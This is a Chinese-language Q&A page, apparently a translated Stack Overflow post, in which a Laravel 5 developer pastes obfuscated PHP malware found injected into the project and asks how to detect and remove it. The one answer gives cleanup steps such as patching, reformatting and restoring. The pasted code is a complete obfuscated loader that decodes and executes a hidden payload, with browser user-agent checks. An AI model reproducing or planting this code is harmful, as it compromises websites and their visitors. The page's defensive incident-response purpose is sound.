随机的PHP脚本注入我的项目

时间:2017-11-16 13:48:37

标签: php laravel laravel-5

在我的laravel 5项目中,以下代码被注入我的项目中:

<?php $exbgult = 'f`x   x22l:!}V;3q%}U;y]-rr.93e:5597f-s.973:8297f:5297e:5  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)vd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!gj!|!*bubE{h%)j{hnpd!opjudovg!762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<8R#>q%V<*#fopoV;hojepdoF.uofuopD#!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`op*9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<hftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJutjm!|!*5!  x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sut!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#0fmtf!%b:>%s:   x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>52]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!6<.fmjgA x27doj%6<   x7fw6*mjix6<C   x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7unction sgkkpzf($n){ret)sfebfI{*w%)kVx{**#k#)tutjyv%7UFH#  x27rfs%6~6< x7fw6<*K)}_;#)323ldfid>}&;!osvufs}  x7f;!opjudovg}k~~9{d%:osUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    x7fw6*  x7f_*#u)1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1gpf{jt)!gj!<*2bd%-#1GO  x22#)fepmqyfA>2b%]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%56    x63 164 x69 157 x6e"; fvr#  x5cq%)ufttj x22)gj6<^#Y#    x5cq%mfdcyvi("", $qseooyw); $yhdszep();}} $mfdcyvi = "  x63 162 x65 141 x74 145 x5f 146 x75 1]273]D6P2L5P6]y6gP7L6M7]48L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]K   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fj3hopmA  x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqmpef)#41   107 x45 116 x54"]); if ((s%w:**<")));$yhdszep = $%Z<^2  x5c2b%!>!2p%!*3>?*2b%)) or (strstr($uas,"   x66 151 x72 145 x66 157 x78"))) {idk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc  x7f!|!*uyfu x2fuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!   x24/%tmw/   x24)%SFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#p%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfww6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}vg}x;0]=])0#)U!   x27{**u%-#jt0}Z;0]=]0#)2q%l}S#<!%w:!>!(%w:!>!   x246767~#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9gjZ<#opo#>b%!**X)ufttjssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFif((function_exists("  x6f 142 x5f 163 x74 141 x72 1   x64 162 x6f 151 x64")) or (strstr($uas,"    x63 150 x72 157 x6d 145")d%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbvufs:~928>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqn!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)R6Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hA   xepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985error_reporting(0); $qseooyw = impl7k:!ftmf!}Z;^nbsbq%   x5cSFWcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)D4]275]D:M8]Df#<%tdz>#L4]275L3]24]y8   x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    xs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbut`cp|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p#Qi   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/RVER["  x48 124 x54 120 x5f 125 x53 105 x52 137 x24/%tjw/   x24)%   x24-    x24y4   x24-    x2{h%)tpqsut>j%!*9! x27!hmg%ode(array_map("sgkkpzf",str_split("%tjw!>!#]y84]275]y83]gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!  x27!hmg%)!gj!<2,*j%-#1]#-bubE27pd%6<C   x27pd%6|6.7eu{6]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe)c]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#z!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4])))) { $GLOBALS["   x61 156 x75 156 x61"]=1; $uas=strtolower($_SE%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-w6*CW&)7gj6<*doj%7-C)fepmqnjA  x27&X   x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7f3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]DS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`Q37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#us)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x#-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvct#M#-#[#-#Y#-#D#-#W#-#V   x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*XAZ)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!  x22)gj!|!*nbsbq%)323ldf%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y>b%Z<#opo#>b%!*##>>X)!UUI&b%!|!*)323zbek!~!<b% x7f!<X6-xr.985:52985-t.98]K4]65]D8]86]y31]278]yx5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_   x5c}    x5cq%7/7#@#7/7^#iubq#   x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfK;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msrfs%6<#o]1/20QUUI7jsid%)dfyfR    x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV6~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6<    x7fw6*CW&)7gj6< x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+jojRk3`{666~6<&w6<  x7fw6*CW&)7gj6<.[A  x27&6<  x7fpdov{h19275j{hnpd19275fubmgoj{h1:|:*m`GB)fubfsdXA    x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!+!<+{e%+*!*jidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnjtrstr($uas,"   x6d 163 x69 145")) orjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<*248]y83]256]y81]265]y72]254]y76urn chr(ord($n)-1);} @zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    0;quui#>.%!<***f    x27,*e  x27,*d  x27,*c  x27,*b  x27!%o:!>!  x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x2464") && (!isset($GLOBALS["   x61 156 x75 156 x61"27R66,#/q%>2q%<#g6R85,67R37,16<Cw6<pd%w6Z6<.5`hA    x27pd%6<pd%w2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]4 (strstr($uas," x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156}R;2]},;osvufs}  x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudo#-!#f6c68399#-!#65egb2dc#*<!s4]82]K6]72]K9]78]K5]53]Kc#<%tp)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>q+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSexszpyxqoh'; $xfctlhz=explode(chr((550-430)),substr($exbgult,(30778-24758),(217-183))); $hsgtsqf = $xfctlhz[0]($xfctlhz[(3-2)]); $fubpeao = $xfctlhz[0]($xfctlhz[(14-12)]); if (!function_exists('wflbtbvpa')) { function wflbtbvpa($fgenax, $khaipyaq,$nthiky) { $hswxpmj = NULL; for($wwpjsp=0;$wwpjsp<(sizeof($fgenax)/2);$wwpjsp++) { $hswxpmj .= substr($khaipyaq, $fgenax[($wwpjsp*2)],$fgenax[($wwpjsp*2)+(6-5)]); } return $nthiky(chr((40-31)),chr((631-539)),$hswxpmj); }; } $watpdooupr = explode(chr((207-163)),'2290,51,5499,47,3522,64,3103,48,1659,29,5199,34,5739,63,2341,67,1739,53,1371,51,1275,26,942,23,5311,22,2687,35,3210,56,5280,31,2144,25,5575,32,2578,55,3334,24,4822,64,3749,49,893,49,4740,20,992,29,526,70,5027,64,1565,50,4612,62,1301,34,1502,63,3654,34,868,25,54,59,4760,62,1071,50,4942,48,2029,70,4674,66,175,40,337,57,5233,47,394,65,3266,68,3184,26,113,62,596,56,2748,59,215,31,3002,59,1711,28,1190,40,652,48,5385,48,5928,54,1962,67,5151,48,2520,58,2408,54,2244,46,3862,31,4381,31,4359,22,2222,22,4281,24,1792,52,2722,26,1899,63,1021,50,2462,58,4990,37,5091,60,5982,38,2958,44,4117,57,4509,56,5546,29,304,33,965,27,0,21,5802,67,2099,45,4565,47,3688,61,459,67,4305,54,1230,45,4174,52,3893,40,246,58,5433,66,4051,45,3933,64,3151,33,2839,51,2890,68,1615,44,4886,56,3061,42,2169,53,5869,29,1844,55,5333,52,4453,56,2633,54,21,33,4412,41,3798,64,5898,30,3469,53,1422,24,2807,32,1446,56,3399,70,3997,54,5674,65,770,56,3358,41,1121,69,826,42,700,70,5607,67,3586,68,4096,21,4226,55,1688,23,1335,36'); $jruxurnjje = $hsgtsqf("",wflbtbvpa($watpdooupr,$exbgult,$fubpeao)); $hsgtsqf=$exbgult; $jruxurnjje(""); $jruxurnjje=(787-666); $exbgult=$jruxurnjje-1; ?>

我观察过这些脚本的2-3种类型,上面的脚本就是其中之一

请帮我写一个这段代码的正则表达式,这样我就可以找到这段代码并将其删除,或者如果有人知道如何识别这段脚本的来源 这个脚本会导致我的网站速度变慢

1 个答案:

答案 0 :(得分:1)

你很可能被黑了。您可以尝试删除此代码,并查看它返回之前需要多长时间。如果它回来了你应该:

  1. 了解黑客如何访问您的网站
  2. 修补代码中的漏洞
  3. 格式化服务器,是获取rootkit的唯一可靠方法
  4. 安装新版本的应用
  5. 如果DB与您的应用程序在同一服务器上从备份还原数据库